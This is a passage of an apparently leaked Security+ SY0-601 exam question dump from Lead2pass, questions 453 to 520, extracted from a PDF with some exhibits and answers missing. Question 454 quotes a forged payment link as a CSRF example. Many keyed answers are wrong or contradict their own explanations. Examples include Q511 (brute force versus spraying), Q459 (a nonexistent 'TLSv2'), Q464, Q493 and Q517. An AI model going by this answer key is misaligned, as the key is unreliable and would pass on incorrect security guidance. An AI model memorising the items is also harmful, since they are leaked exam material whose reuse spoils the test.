https://www.lead2pass.com
154
Answer:
QUESTION 453
Hotspot Question
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUCTIONS
Please click on the below items on the network diagram and configure them accordingly:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
155
WAP
DHCP Server
AAA Server
Wireless Controller
LDAP Server
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
156
Answer:
QUESTION 454
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
157
A forensics investigator is examining a number of unauthorized payments that were reported on
the company’s website. Some unusual log entries show users received an email for an unwanted
mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to
the phishing team, and the forwarded email revealed the link to be:
<a
href=“https://www.company.com/payto.do?routing=00001111&acct=22223334&a
mount=250”>Click here to unsubscribe</a>
Which of the following will the forensics investigator MOST likely determine has occurred?
A.
B.
C.
D.
SQL injection
Broken authentication
XSS
XSRF
Answer: D
Explanation:
XSRF or CSRF can make unauthorized requests on behalf of a victim by clicking links in emails
or elements in a suspicious website.
QUESTION 455
Ann, a customer, received a notification from her mortgage company stating her PII may be
shared with partners, affiliates, and associates to maintain day-to-day business operations.
Which of the following documents did Ann receive?
A.
B.
C.
D.
An annual privacy notice
A non-disclosure agreement
A privileged-user agreement
A memorandum of understanding
Answer: A
Explanation:
Ann received an annual privacy notice from her mortgage company, which is sent out to
customers to inform them of their PII may be processed, shared, or stored by the company's
partners, affiliates, and associates. The notice also outlines the rights customers have with
regards to their personal data.
QUESTION 456
Which of the following would BEST identify and remediate a data-loss event in an enterprise
using third-party, web-based services and file-sharing platforms?
A.
B.
C.
D.
SIEM
CASB
UTM
EDR
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) is a security solution that sits between an enterprise's
on-premises infrastructure and its cloud-based applications and services. It helps to secure the
use of these cloud-based services by providing visibility, control, and protection for data in the
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
158
cloud. A CASB can help to identify and remediate data-loss events by monitoring the use of
cloud-based services, identifying unusual or suspicious activity, and alerting the appropriate
personnel when necessary. It can also help to prevent data loss by enforcing policies to control
the access and use of data in the cloud, and by providing encryption and other security measures
to protect data in transit and at rest.
QUESTION 457
While reviewing pcap data, a network security analyst is able to locate plaintext usernames and
passwords being sent from workstations to network witches. Which of the following is the security
analyst MOST likely observing?
A.
B.
C.
D.
SNMP traps
A Telnet session
An SSH connection
SFTP traffic
Answer: B
Explanation:
The only protocol that has weak encryption and transmits clear text is telnet.
QUESTION 458
An organization is concerned about hackers potentially entering a facility and plugging in a
remotely accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Choose two.)
A.
B.
C.
D.
E.
F.
MAC filtering
Zero Trust segmentation
Network access control
Access control vestibules
Guards
Bollards
Answer: DE
Explanation:
We are asked for the first line of defense. Not the most versatile, or best combination. What if we
had it all, which ones would be the first two. Well we have to stop the adversaries from entering
the facility of course. Access control vestibules and guards do this. Then we have the more
technical solutions such as Mac filtering or NAC, but as I noted, we need to pick the two which
would be our first line of defense.
QUESTION 459
A security analyst is hardening a network infrastructure. The analyst is given the following
requirements:
- Preserve the use of public IP addresses assigned to equipment on the
core router.
- Enable "in transport" encryption protection to the web server with
the strongest ciphers.
Which of the following should the analyst implement to meet these requirements? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
159
A.
B.
C.
D.
E.
F.
Configure VLANs on the core router
Configure NAT on the core router
Configure BGP on the core router
Configure AES encryption on the web server
Enable 3DES encryption on the web server
Enable TLSv2 encryption on the web server
Answer: BF
QUESTION 460
During an investigation, a security manager receives notification from local authorities mat
company proprietary data was found on a former employees home computer. The former
employee's corporate workstation has since been repurposed, and the data on the hard drive has
been overwritten.
Which of the following would BEST provide the security manager with enough details to
determine when the data was removed from the company network?
A.
B.
C.
D.
Properly configured hosts with security logging
Properly configured endpoint security tool with darting
Properly configured SIEM with retention policies
Properly configured USB blocker with encryption
Answer: A
QUESTION 461
The security team received a report of copyright infringement from the IP space of the corporate
network. The report provided a precise time stamp for the incident as well as the name of the
copyrighted file. The analyst has been tasked with determining the infringing source machine and
instructed to implement measures to prevent such incidents from occurring again.
Which of the following is MOST capable of accomplishing both tasks?
A.
B.
C.
D.
HIDS
Allow list
TPM
NGFW
Answer: D
Explanation:
Next Generation Firewall (NGFW) is a network firewall security device designed to filter and
inspect network and application traffic for threats, secure the network environment from intrusion,
and bring in security intelligence from outside the network.
Host-based intrusion detection system (HIDS) is designed to monitor important operating system
files. It protects systems from both internal and external threats. A host-based intrusion detection
system has less visibility than other types and operates solely within the limits of its host machine.
QUESTION 462
A company recently experienced an attack during which its main website was directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company implement to prevent this type of attack occurring in
the future?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
160
A.
B.
C.
D.
IPSec
SSL/TLS
DNSSEC
S/MIME
Answer: C
QUESTION 463
A security researching is tracking an adversary by noting its attack and techniques based on its
capabilities, infrastructure, and victims.
Which of the following is the researcher MOST likely using?
A.
B.
C.
D.
The Diamond Model of intrusion Analysis
The Cyber Kill Chain
The MITRE CVE database
The incident response process
Answer: A
QUESTION 464
Security analyst must enforce policies to harden an MOM infrastructure. The requirements are as
follows:
- Ensure mobile devices can be traded and wiped.
- Confirm mobile devices are encrypted.
Which of the following should the analyst enable on all the devices to meet these requirements?
A.
B.
C.
D.
Geofencing
Biometric authentication
Geolocation
Geotagging
Answer: B
QUESTION 465
A user downloaded an extension for a browser, and the uses device later became infected. The
analyst who is investigating the incident saw various logs where the attacker was hiding activity
by deleting data The following was observed running:
Which of the following is the malware using to execute the attack?
A.
B.
C.
D.
PowerShell
Python
Bash
Macros
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
161
QUESTION 466
An organization is building backup server rooms in geographically diverse locations. The Chief
Information Security Officer implemented a requirement on the project that states the new
hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of
the following should the systems engineer consider?
A.
B.
C.
D.
Purchasing hardware from different vendors
Migrating workloads to public cloud infrastructure
Implementing a robust patch management solution
Designing new detective security controls
Answer: A
Explanation:
Different vendors, different products, different vulns on the devices. if you have all cisco
equipment the vulns on the switches are the same.
QUESTION 467
An engineer needs to deploy a security measure to identify and prevent data tampering within the
enterprise.
Which of the following will accomplish this goal?
A.
B.
C.
D.
Antivirus
IPS
FTP
FIM
Answer: D
Explanation:
Data tampering prevention can include simple security measures such as the encryption of data,
and can include lengths such as using file integrity monitoring (FIM) systems for better security.
https://www.cypressdatadefense.com/blog/data-tampering-prevention/
QUESTION 468
When planning to build a virtual environment, an administrator need to achieve the following:
- Establish polices in Limit who can create new VMs
- Allocate resources according to actual utilization`
- Require justification for requests outside of the standard
requirements.
- Create standardized categories based on size and resource
requirements
Which of the following is the administrator MOST likely trying to do?
A.
B.
C.
D.
Implement IaaS replication
Product against VM escape
Deploy a PaaS
Avoid VM sprawl
Answer: D
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
162
QUESTION 469
The SIEM at an organization has detected suspicious traffic coming from a workstation in its
internal network. An analyst in the SOC investigates the workstation and discovers malware that
is associated with a botnet is installed on the device. A review of the logs on the workstation
reveals that the privileges of the local account were escalated to a local administrator. To which
of the following groups should the analyst report this real-world event?
A.
B.
C.
D.
The NOC team
The vulnerability management team
The CIRT
The read team
Answer: C
Explanation:
Also known as a “computer incident response team,” this group is responsible for responding to
security breaches, viruses and other potentially catastrophic incidents in enterprises that face
significant security risks. In addition to technical specialists capable of dealing with specific
threats, it should include experts who can guide enterprise executives on appropriate
communication in the wake of such incidents.
QUESTION 470
A security analyst has received several reports of an issue on an internal web application. Users
state they are having to provide their credentials twice to log in.
The analyst checks with the application team and notes this is not an expected behavior. After
looking at several logs, the analyst decides to run some commands on the gateway and obtains
the following output:
Which of the following BEST describes the attack the company is experiencing?
A.
B.
C.
D.
MAC flooding
URL redirection
ARP poisoning
DNS hijacking
Answer: C
QUESTION 471
While investigating a data leakage incident a security analyst reviews access control to cloud hosted data. The following information was presented in a security posture report:
Policy to control external application integration: Admin authorized
only
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
163
-
47 active integration to third-party applications
2 applications authorized by admin
45 applications authorized by users
32 OAuth apps authorize to access data
Based on the report, which of the following was the MOST likely attack vector used against the
company?
A.
B.
C.
D.
Spyware
Logic bomb
Potentially unwanted programs
Supply chain
Answer: A
QUESTION 472
Which of the following corporate policies is used to help prevent employee fraud and to detect
system log modifications or other malicious activity based on tenure?
A.
B.
C.
D.
Background checks
Mandatory vacation
Social media analysis
Separation of duties
Answer: B
QUESTION 473
Which of the following holds staff accountable while escorting unauthorized personnel?
A.
B.
C.
D.
Locks
Badges
Cameras
Visitor logs
Answer: B
QUESTION 474
An analyst is generating a security report for the management team. Security guidelines
recommend disabling all listening unencrypted services. Given this output from Nmap:
Which of the following should the analyst recommend to disable?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
164
A.
B.
C.
D.
21/tcp
22/tcp
23/tcp
443/tcp
Answer: C
Explanation:
Telnet is a client-server protocol used for the link to port number 23 of Transmission Control
Protocol.
Telnet protocol - unencrypted text communications.
QUESTION 475
A security analyst is Investigating a malware incident at a company. The malware Is accessing a
command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a
syslog server and stored in /logfiles/messages.
Which of the following commands would be BEST for the analyst to use on the syslog server to
search for recent traffic to the command-and-control website?
A.
B.
C.
D.
Option A
Option B
Option C
Option D
Answer: C
QUESTION 476
Which of the following function as preventive, detective, and deterrent controls to reduce the risk
of physical theft? (Choose two.)
A.
B.
C.
D.
E.
F.
Mantraps
Security guards
Video surveillance
Fences
Bollards
Antivirus
Answer: BC
QUESTION 477
The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
165
method. The concept Includes granting logical access based on physical location and proximity.
Which of the following Is the BEST solution for the pilot?
A.
B.
C.
D.
Geofencing
Self-sovereign identification
PKl certificates
SSO
Answer: A
QUESTION 478
A Chief Information Officer receives an email stating a database will be encrypted within 24 hours
unless a payment of $20,000 is credited to the account mentioned In the email. This BEST
describes a scenario related to:
A.
B.
C.
D.
whaling.
smishing.
spear phishing
Vishing.
Answer: A
QUESTION 479
A cyber threat intelligence analyst is gathering data about a specific adversary using OSINT
techniques.
Which of the following should the analyst use?
A.
B.
C.
D.
Internal log files
Government press releases
Confidential reports
Proprietary databases
Answer: B
Explanation:
In the fraud detection and prevention sector, OSINT is helpful in identifying bad actors and
minimizing the risks for government agencies and businesses. Using OSINT, investigators can
identify illegal activity related to fraud, and uncover hidden leads in real time, according to the
whitepaper. For example, using open-source intelligence, analysts and investigators can uncover
the sale of fraud toolkits and methods shared through online forums or through marketplaces.
QUESTION 480
Which of the following would satisfy three-factor authentication?
A.
B.
C.
D.
Password, retina scanner, and NFC card
Password, fingerprint scanner, and retina scanner
Password, hard token, and NFC card
Fingerprint scanner, hard token, and retina scanner
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
166
QUESTION 481
Which two features are available only in next-generation firewalls? (Choose two)
A.
B.
C.
D.
E.
deep packet inspection
packet filtering
application awareness
stateful inspection
virtual private network
Answer: AC
Explanation:
Deep packet inspection (DPI) is a technology that allows a firewall to examine the contents of
network packets. This allows the firewall to identify and block malicious traffic that may not be
detected by traditional firewalls that only inspect the headers of network packets.
Application awareness is a technology that allows a firewall to understand the applications that
are running on a network. This allows the firewall to identify and block malicious traffic that is
targeting specific applications.
QUESTION 482
A developer is building a new portal to deliver single-pane-of-glass management capabilities to
customers with multiple firewalls.
To Improve the user experience, the developer wants to implement an authentication and
authorization standard that uses security tokens that contain assertions to pass user Information
between nodes.
Which of the following roles should the developer configure to meet these requirements? (Choose
two.)
A.
B.
C.
D.
E.
F.
Identity processor
Service requestor
Identity provider
Service provider
Tokenized resource
Notarized referral
Answer: CD
Explanation:
An identity provider (IdP) is a trusted third party that provides authentication services to other
parties, such as the portal in this case. The IdP authenticates users and issues security tokens
that contain assertions about the user's identity.
A service provider (SP) is a party that provides services to users. The SP uses the security
tokens issued by the IdP to authenticate users and grant them access to its services.
QUESTION 483
A security analyst was deploying a new website and found a connection attempting to
authenticate on the site's portal.
While Investigating the incident, the analyst identified the following Input in the username field:
Which of the following BEST explains this type of attack?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
167
A.
B.
C.
D.
DLL injection to hijack administrator services
SQLi on the field to bypass authentication
Execution of a stored XSS on the website
Code to execute a race condition on the server
Answer: B
QUESTION 484
Which of the following uses six initial steps that provide basic control over system security by
including hardware and software inventory, vulnerability management, and continuous monitoring
to minimize risk in all network environments?
A.
B.
C.
D.
ISO 27701
The Center for Internet Security
SSAE SOC 2
NIST Risk Management Framework
Answer: D
QUESTION 485
Developers are writing code and merging it into shared repositories several times a day, where it
is tested automatically. Which of the following concepts does this BEST represent?
A.
B.
C.
D.
Functional testing
Stored procedures
Elasticity
Continuous integration
Answer: D
Explanation:
Continuous Integration (CI) is a development practice where developers integrate code into a
shared repository frequently, preferably several times a day. Each integration can then be verified
by an automated build and automated tests.
QUESTION 486
Which of the following environments would MOST likely be used to assess the execution of
component parts of a system at both the hardware and software levels and to measure
performance characteristics?
A.
B.
C.
D.
Test
Staging
Development
Production
Answer: A
QUESTION 487
Remote workers in an organization use company-provided laptops with locally installed
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
168
applications and locally stored data Users can store data on a remote server using an encrypted
connection. The organization discovered data stored on a laptop had been made available to the
public. Which of the following security solutions would mitigate the risk of future data disclosures?
A.
B.
C.
D.
FDE
TPM
HIDS
VPN
Answer: A
QUESTION 488
Which of the following describes a maintenance metric that measures the average time required
to troubleshoot and restore failed equipment?
A.
B.
C.
D.
RTO
MTBF
MTTR
RPO
Answer: C
Explanation:
Mean time to repair (MTTR) is a measure of the maintainability of a repairable item, which tells
the average time required to repair a specific item or component and return it to working status. It
is a basic measure of the maintainability of equipment and parts. This includes the notification
time, diagnosis and the time spent on actual repair as well as other activities required before the
equipment can be used again. Mean time to repair is also known as mean repair time.
https://www.techopedia.com/definition/2719/mean-time-to-repair-mttr
QUESTION 489
Which of the following is a difference between a DRP and a BCP?
A.
B.
C.
D.
A BCP keeps operations running during a disaster while a DRP does not.
A BCP prepares for any operational interruption while a DRP prepares for natural disasters
A BCP is a technical response to disasters while a DRP is operational.
A BCP Is formally written and approved while a DRP is not.
Answer: C
QUESTION 490
A grocery store is expressing security and reliability concerns regarding the on-site backup
strategy currently being performed by locally attached disks. The main concerns are the physical
security of the backup media and the durability of the data stored on these devices.
Which of the following is a cost-effective approach to address these concerns?
A.
B.
C.
D.
Enhance resiliency by adding a hardware RAID.
Move data to a tape library and store the tapes off site
Install a local network-attached storage.
Migrate to a cloud backup solution
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
169
Answer: D
QUESTION 491
A systems administrator is looking for a solution that will help prevent OAuth applications from
being leveraged by hackers to trick users into authorizing the use of their corporate credentials.
Which of the following BEST describes this solution?
A.
B.
C.
D.
CASB
UEM
WAF
VPC
Answer: C
QUESTION 492
Which of the following is an example of risk avoidance?
A.
B.
C.
D.
Installing security updates directly in production to expedite vulnerability fixes
Buying insurance to prepare for financial loss associated with exploits
Not installing new software to prevent compatibility errors
Not taking preventive measures to stop the theft of equipment
Answer: C
Explanation:
Installing updates in production = idiocy.
Purchase of insurance = transfer.
Not taking action = ridiculous.
QUESTION 493
Which of the following BEST describes the method a security analyst would use to confirm a file
that is downloaded from a trusted security website is not altered in transit or corrupted using a
verified checksum?
A.
B.
C.
D.
Hashing
Salting
Integrity
Digital signature
Answer: D
Explanation:
Digital signature is used to verify the integrity of a file/application.
QUESTION 494
A bad actor tries to persuade someone to provide financial information over the phone in order to
gain access to funds. Which of the following types of attacks does this scenario describe?
A. Vishing
B. Phishing
C. Spear phishing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
170
D. Whaling
Answer: A
QUESTION 495
During an incident, an EDR system detects an increase in the number of encrypted outbound
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will BEST assist the analyst?
A.
B.
C.
D.
A vulnerability scanner
A NGFW
The Windows Event Viewer
A SIEM
Answer: D
QUESTION 496
Which of the following threat actors is MOST likely to be motivated by ideology?
A.
B.
C.
D.
E.
Business competitor
Hacktivist
Criminal syndicate
Script kiddie
Disgruntled employee
Answer: B
QUESTION 497
A company wants to deploy systems alongside production systems in order to entice threat actors
and to learn more about attackers. Which of the following BEST describe these systems?
A.
B.
C.
D.
DNS sinkholes
Honeypots
Virtual machines
Neural network
Answer: B
Explanation:
A honeypot is a network-attached system set up as a decoy to lure cyber attackers and detect,
deflect and study hacking attempts to gain unauthorized access to information systems. The
function of a honeypot is to represent itself on the internet as a potential target for attackers -usually, a server or other high-value asset -- and to gather information and notify defenders of
any attempts to access the honeypot by unauthorized users.
QUESTION 498
A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the
inability to use SCP to transfer files to the NAS, even though the data is still viewable from the
users PCs. Which of the following is the MOST likely cause of this issue?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
171
A.
B.
C.
D.
TFTP was disabled on the local hosts
SSH was turned off instead of modifying the configuration file
Remote login was disabled in the networkd.config instead of using the sshd.conf
Network services are no longer running on the NAS
Answer: B
Explanation:
The most likely cause of the issue is that SSH was turned off instead of modifying the
configuration file. SSH (Secure Shell) is a commonly used protocol for securely accessing and
managing remote systems, including network-attached storage (NAS) devices. Disabling remote
logins to the NAS would most likely involve modifying the configuration file for the SSH service
(sshd.conf), not disabling SSH itself. If SSH was turned off, it would prevent users from accessing
the NAS over the network, including using SCP (Secure Copy Protocol) to transfer files. This
would result in the inability to use SCP to transfer files to the NAS, even though the data is still
viewable from the users’ PCs.
QUESTION 499
Customers reported their antivirus software flagged one of the company's primary software
products as suspicious. The company's Chief Information Security Officer has tasked the
developer with determining a method to create a trust model between the software and the
customer's antivirus software. Which of the following would be the BEST solution?
A.
B.
C.
D.
Code signing
Domain validation
Extended validation
Self-signing
Answer: C
QUESTION 500
Users reported several suspicious activities within the last two weeks that resulted in several
unauthorized transactions. Upon investigation, the security analyst found the following:
- Multiple reports of breached credentials within that time period
- Traffic being redirected in certain parts of the network
- Fraudulent emails being sent by various internal users without their
consent
Which of the following types of attacks was MOST likely used?
A.
B.
C.
D.
Replay attack
Race condition
Cross site scripting
Request forgeries
Answer: D
Explanation:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted
actions on a web application in which they’re currently authenticated. With a little help of social
engineering (such as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker’s choosing. If the victim is a normal user, a
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
172
successful CSRF attack can force the user to perform state changing requests like transferring
funds, changing their email address, and so forth. If the victim is an administrative account, CSRF
can compromise the entire web application.
QUESTION 501
A network analyst is investigating compromised corporate information. The analyst leads to a
theory that network traffic was intercepted before being transmitted to the internet. The following
output was captured on an internal host:
IPv4 Address ............ 10.0.0.87
Subnet Mask ............. 255.255.255.0
Default Gateway ......... 10.0.0.1
Internet Address
10.10.255.255
10.0.0.1
10.0.0.254
244.0.0.2
Physical Address
ff-ff-ff-ff-ff-ff
aa-aa-aa-aa-aa-aa
aa-aa-aa-aa-aa-aa
01-00-5e-00-00-02
Based on the IoCs, which of the following was the most likely attack used to compromise the
network communication?
A.
B.
C.
D.
Denial of service
ARP poisoning
Command injection
MAC flooding
Answer: B
Explanation:
ARP poisoning is a type of attack that modifies the ARP cache on a network device. The ARP
cache is a table that stores the IP addresses and MAC addresses of other devices on the
network. When a device needs to send a packet to another device, it looks up the MAC address
of the destination device in its ARP cache. If the MAC address is not in the cache, the device
sends an ARP request to the destination device. The destination device responds to the ARP
request with its MAC address.
In ARP poisoning, the attacker sends spoofed ARP messages to the victim device. The spoofed
ARP messages contain the attacker's MAC address as the source MAC address and the victim's
IP address as the destination IP address. When the victim device receives the spoofed ARP
messages, it updates its ARP cache to associate the attacker's MAC address with the victim's IP
address.
Now, when the victim device needs to send a packet to another device, it will use the attacker's
MAC address as the destination MAC address. The attacker can then intercept the packet and
read or modify its contents.
In the given scenario, the network analyst found that the ARP cache on the internal host was
poisoned. The attacker's MAC address was associated with the victim's IP address. This means
that the attacker was able to intercept network traffic from the victim device.
QUESTION 502
A company's cybersecurity department is looking for a new solution to maintain high availability.
Which of the following can be utilized to build a solution? (Select Two)
A. A stateful inspection
B. IP hashes
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
173
C. A round robin
D. A VLAN
E. A DMZ
Answer: CD
Explanation:
VLAN pooling is a feature that enables you to group multiple wireless controller VLANs to form a
VLAN pool. Configure a VLAN pool to load-balance sessions evenly across multiple VLANs.
Individual VLANs are then assigned dynamically from the pool, using a round robin algorithm,
when a wireless client accesses the network.
QUESTION 503
A user's PC was recently infected by malware. The user has a legacy printer without vendor
support, and the user's OS is fully patched. The user downloaded a driver package from the
internet. No threats were found on the downloaded file, but during file installation, a malicious
runtime threat was detected. Which of the following is MOST likely cause of the infection?
A. The driver has malware installed and was refactored upon download to avoid detection.
B. The user's computer has a rootkit installed that has avoided detection until the new
driver overwrote key files.
C. The user's antivirus software definition were out of date and were damaged by the
installation of the driver
D. The user's computer has been infected with a logic bomb set to run when new driver
was installed.
Answer: A
Explanation:
When the user downloaded the driver package from the internet, the malware was already
installed in the driver package. The malware was refactored upon download to avoid detection by
antivirus software. When the user installed the driver, the malware was installed on the user's
computer.
QUESTION 504
Which of the following controls would BEST identify and report malicious insider activities?
A.
B.
C.
D.
An intrusion detection system
A proxy
Audit trails
Strong authentication
Answer: A
QUESTION 505
A security analyst is investigating a phishing email that contains a malicious document directed to
the company's Chief Executive Officer (CEO). Which of the following should the analyst perform
to understand the threat and retrieve possible IoCs?
A. Run a vulnerability scan against the CEOs computer to find possible vulnerabilities
B. Install a sandbox to run the malicious payload in a safe environment
C. Perform a traceroute to identify the communication path
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
174
D. Use netstat to check whether communication has been made with a remote host
Answer: B
QUESTION 506
A SOC is currently being outsourced. Which of the following is being used?
A.
B.
C.
D.
Microservices
SaaS
MSSP
PaaS
Answer: C
QUESTION 507
A company is considering transitioning to the cloud. The company employs individuals from
various locations around the world. The company does not want to increase its on premises
infrastructure blueprint and only wants to pay for additional compute power required. Which of the
following solutions would BEST meet the needs of the company?
A.
B.
C.
D.
Private cloud
Hybrid environment
Managed security service provider
Hot backup site
Answer: B
Explanation:
The company does not want to increase its on premises infrastructure blueprint.
QUESTION 508
An organization recently discovered that a purchasing officer approved an invoice for an amount
that was different than the original purchase order. After further investigation a security analyst
determines that the digital signature for the fraudulent invoice is exactly the same as the digital
signature for the correct invoice that had been approved Which of the following attacks MOST
likely explains the behavior?
A.
B.
C.
D.
Birthday
Rainbow table
Impersonation
Whaling
Answer: C
Explanation:
In impersonation attacks, attackers trick victims into believing that they are someone else. In this
case, the attackers may have impersonated the vendor who sent the invoice. They may have
sent an email that appeared to be from the vendor, and the email may have contained a
fraudulent invoice with the same digital signature as the original invoice.
QUESTION 509
Which of the following should a technician consider when selecting an encryption method for data
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
175
that needs to remain confidential for a specific length of time?
A.
B.
C.
D.
The key length of the encryption algorithm
The encryption algorithm's longevity
A method of introducing entropy into key calculations
The computational overhead of calculating the encryption key
Answer: A
Explanation:
The key length is the number of bits used to encrypt the data. The longer the key length, the more
difficult it is for an attacker to crack the encryption. In this case, the technician needs to select an
encryption method that uses a key length that is long enough to keep the data confidential for the
specific length of time required.
QUESTION 510
A security engineer is deploying a new wireless for a company. The company shares office space
with multiple tenants.
Which of the following should the engineer configured on the wireless network to ensure that
confidential data is not exposed to unauthorized users?
A.
B.
C.
D.
EAP
TLS
HTTPS
AES
Answer: D
Explanation:
EAP- Extensible Authentication Protocol (EAP), an authentication framework that provides
general guidance for authentication methods. IEEE 802.1x servers typically use one of these
methods to increase the level of security during the authentication process
TLS- Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are encryption protocols
that have been commonly used to encrypt data-in- transit. For example, it is common to encrypt
HTTPS with either SSL or TLS to ensure confidentiality of data transmitted over the Internet.
They can also be used to encrypt other transmissions such as File Transfer Protocol Secure
(FTPS). However, TLS is now a replacement for SSL as SSL is deprecated and shouldn't be
used.
AES- Advanced Encryption Standard. A strong symmetric block cipher that encrypts data in 128bit blocks. AES can use key sizes of 128 bits, 192 bits, or 256 bits.
HTTPS- Hypertext Transfer Protocol Secure. A protocol used to encrypt HTTP traffic. HTTPS
encrypts traffic with TLS using TCP port 443.
This question specifically states preventing exposed data to unauthorized users. TLS and HTTPS
only encrypt in-transit data. Data-at-rest in a network is insecure, though.
Only AES meets the criteria of providing confidentiality to both data-at-rest and data-in-transit,
preventing unauthorized users from seeing either.
QUESTION 511
A user's account is constantly being locked out. Upon further review, a security analyst found the
following in the SIEM:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
176
Which of the following describes what is occurring?
A.
B.
C.
D.
An attacker is utilizing a password-spraying attack against the account.
An attacker is utilizing a dictionary attack against the account.
An attacker is utilizing a brute-force attack against the account.
An attacker is utilizing a rainbow table attack against the account.
Answer: C
Explanation:
Password spraying is an attack that attempts to access a large number of accounts (usernames)
with a few commonly used passwords. Traditional brute-force attacks attempt to gain
unauthorized access to a single account by guessing the password.
QUESTION 512
A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware. Which of the
following deployment models will provide the needed flexibility with the GREATEST amount of
control and security over company data and infrastructure?
A.
B.
C.
D.
BYOD
VDI
COPE
CYOD
Answer: D
QUESTION 513
During an asset inventory, several assets, supplies, and miscellaneous items were noted as
missing. The security manager has been asked to find an automated solution to detect any future
theft of equipment. Which of the following would be BEST to implement?
A.
B.
C.
D.
E.
Badges
Fencing
Access control vestibule
Lighting
Cameras
Answer: C
QUESTION 514
Which of the following environments typically hosts the current version configurations and code,
compares user-story responses and workflow, and uses a modified version of actual data for
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
177
testing?
A.
B.
C.
D.
Development
Staging
Production
Test
Answer: B
Explanation:
Staging is a testing environment that is used to test changes to code and configurations before
they are deployed to production. The staging environment typically hosts the current version of
the code and configurations, and it uses a modified version of actual data for testing. This allows
testers to compare user-story responses and workflow before the changes are deployed to
production.
QUESTION 515
A company installed several crosscut shredders as part of increased information security
practices targeting data leakage risks. Which of the following will this practice reduce?
A.
B.
C.
D.
Dumpster diving
Shoulder surfing
Information elicitation
Credential harvesting
Answer: A
Explanation:
https://cybersecurityforme.com/dumpster-diving-attack/
QUESTION 516
A client sent several inquiries to a project manager about the delinquent delivery status of some
critical reports. The project manager claimed the reports were previously sent via email, but then
quickly generated and backdated the reports before submitting them as plain text within the body
of a new email message thread.
Which of the following actions MOST likely supports an investigation for fraudulent submission?
A.
B.
C.
D.
Establish chain of custody.
Inspect the file metadata.
Reference the data retention policy.
Review the email event logs
Answer: B
QUESTION 517
A new plug-and-play storage device was installed on a PC in the corporate environment.
Which of the following safeguards will BEST help to protect the PC from malicious files on the
storage device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
178
D. Plug the storage device in to the UPS
Answer: C
Explanation:
Encrypting the disk on the drive could work because if the files on the storage drive is encrypted
that means the data will be in a format that can't be used by other devices anyway. The PC is in a
corporate environment so they're likely using Active Directory where they can implement a GPO
to encrypt removable drives when plugged in to a PC using BitLocker.
QUESTION 518
During a security incident investigation, an analyst consults the company's SIEM and sees an
event concerning high traffic to a known, malicious command-and-control server. The analyst
would like to determine the number of company workstations that may be impacted by this issue.
Which of the following can provide the information?
A.
B.
C.
D.
WAF logs
DNS logs
System logs
Application logs
Answer: B
Explanation:
DNS logs can contain a record for every query and response. It can show the IP addresses and
domain names that your system should/shouldn't be communicating with, it can reveal malware
calling out to its command-and-control server, or data transfers to non-company locations. This is
one of the reasons why DNS logs are some of the most valuable logs to import into a SIEM
system.
QUESTION 519
A security analyst reports a company policy violation in a case in which a large amount of
sensitive data is being downloaded after hours from various mobile devices to an external site.
Upon further investigation, the analyst notices that successful login attempts are being conducted
with impossible travel times during the same time periods when the unauthorized downloads are
occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have
non-standard DHCP configurations and an overlapping channel. Which of the following attacks is
being conducted?
A.
B.
C.
D.
E.
Evil twin
Jamming
DNS poisoning
Bluesnarfing
DDoS
Answer: A
QUESTION 520
Which of the following BEST helps to demonstrate integrity during a forensic investigation?
A. Event logs
B. Encryption
C. Hashing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
179
D. Snapshots
